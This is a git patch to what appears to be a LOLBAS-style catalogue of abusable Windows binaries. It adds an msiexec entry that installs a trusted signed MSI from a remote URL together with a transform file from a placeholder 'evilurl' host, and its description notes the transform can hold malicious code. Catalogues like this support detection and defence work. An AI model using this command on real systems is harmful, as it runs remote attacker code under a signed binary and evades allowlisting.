From ee78111254eeaca96c96bf46457928ba726705e1 Mon Sep 17 00:00:00 2001
From: pfiatde <47333109+PfiatDe@users.noreply.github.com>
Date: Mon, 6 Nov 2023 13:47:04 +0100
Subject: [PATCH] Update Msiexec.yml (#333)

* Update Msiexec.yml

Added transform file execution

* Update Msiexec.yml
---
 yml/OSBinaries/Msiexec.yml | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml
index 6e204f5..7a42552 100644
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@@ -32,6 +32,13 @@ Commands:
     Privileges: User
     MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
+    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
+    Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.007
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\msiexec.exe
   - Path: C:\Windows\SysWOW64\msiexec.exe
@@ -46,6 +53,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
   - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
+  - Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html
 Acknowledgement:
   - Person: netbiosX
     Handle: '@netbiosX'